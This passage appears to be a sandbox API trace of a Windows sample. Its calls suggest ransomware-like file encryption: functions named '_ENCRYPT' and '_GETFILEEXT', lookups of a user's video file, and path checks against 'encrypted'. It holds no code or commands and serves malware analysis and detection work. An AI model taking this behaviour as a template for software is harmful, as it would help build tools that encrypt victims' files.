[0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7a) returned 0x7d5bb8 [0042.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=61, lpWideCharStr=0x7d5bb8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4") returned 61 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.388] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.389] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.390] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.391] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.391] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0042.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.392] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.392] CloseHandle (hObject=0x140) returned 1 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.392] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.393] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.393] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.393] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.393] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.393] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.393] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.393] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18dbab70, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x86f23e40, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0x86f23e40, ftLastWriteTime.dwHighDateTime=0x1d5be63, nFileSizeHigh=0x0, nFileSizeLow=0x165e8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="eahI4-2wsRei.mp4", cAlternateFileName="EAHI4-~1.MP4")) returned 0x7c20c0 [0042.394] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18dbab70, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x86f23e40, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0x86f23e40, ftLastWriteTime.dwHighDateTime=0x1d5be63, nFileSizeHigh=0x0, nFileSizeLow=0x165e8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="eahI4-2wsRei.mp4", cAlternateFileName="EAHI4-~1.MP4")) returned 0x7c20c0 [0042.394] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS 